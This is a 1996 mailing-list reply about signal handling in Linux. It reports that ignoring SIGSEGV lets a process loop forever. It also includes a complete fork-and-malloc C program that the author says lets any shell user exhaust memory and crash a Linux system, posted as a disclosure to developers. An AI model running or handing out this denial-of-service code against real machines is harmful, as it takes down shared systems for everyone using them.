Re: signal(SIGFPE,SIG_IGN), possible solution?

SuperUser (root@moisil.wien.rhno.columbia.edu)
Tue, 23 Apr 1996 22:22:39 -0400


On Tue, 23 Apr 1996, Andreas Kostyrka wrote:

> I was just thinking, and the following solution occured to me, so I just
> want to know if this is possible:
>
> 1) When SIGFPE is been ignored, we want x/0 to return some constant
> value, let's say 0, and continue with the next statement.
> 2) The important thing is, if SIGFPE is signalled by the FPU a bit more
> exact, so we can be sure, that we got SIGFPE because of x/0 or other
> causes.
> 3) The FPU has a stack architecture, that much I know about Intel FPU's :)
> 4) Now we could just pop two arguments from the stack, and because we
> probably know that it will execute the fdiv instruction again, we push
> say 0.0 100.0 on the stack and reexecute the fdiv. It should now
> return a 0.0/100.0==0.0 and all is well.

While this might be a good solution for the SIGFPE example, it does little for
a similar example involving SIGSEGV:

#include <signal.h>

int main()
{
signal(SIGSEGV, SIG_IGN);
*(char*)0 = 0;
return 0;
}

This will happily run until ulimit, root or shutdown kills it. :) Okay,
telling the kernel to ignore the SEGV signal is certainly nothing more
than asking for trouble (maybe it should be forbidden?), and it's not much
worse than a while(1); hanging around. However, I've seen processes (pine
3.91) running for hours, even with ulimit, segfaulting like crazy and
raising the load average by 1. I suppose that pine also intercepts the XCPU
signal (haven't looked through the code), so ulimit has no effect - maybe
that should be forbidden, too?

Anyway, as I said, this is only mildly annoying. What is _really_ bad is
that any user with a shell account can kill a linux machine using something
like this:

#define MEM 1000000

void main()
{
char *p;
long i;

p=(char *)malloc(MEM);
fork();
i=MEM; while (i--) *(p+i-1)=i;
main();
}

This works for machines using ulimit for memory - a slightly modified version
can easily be written for non-ulimit machines. What happens is pretty clear:
the program and its clones allocate all the virtual memory available, so when
init or some other daemon needs memory, there isn't any left... This small
program does _not_ kill a SunOS box (with or without ulimit), although it
renders it pretty much unusable.

Oh, and by the way, libc-5.3.9 _ignores_ the ulimit settings for memory,
while 5.0.9 and 5.2.18 are just fine.

Ionut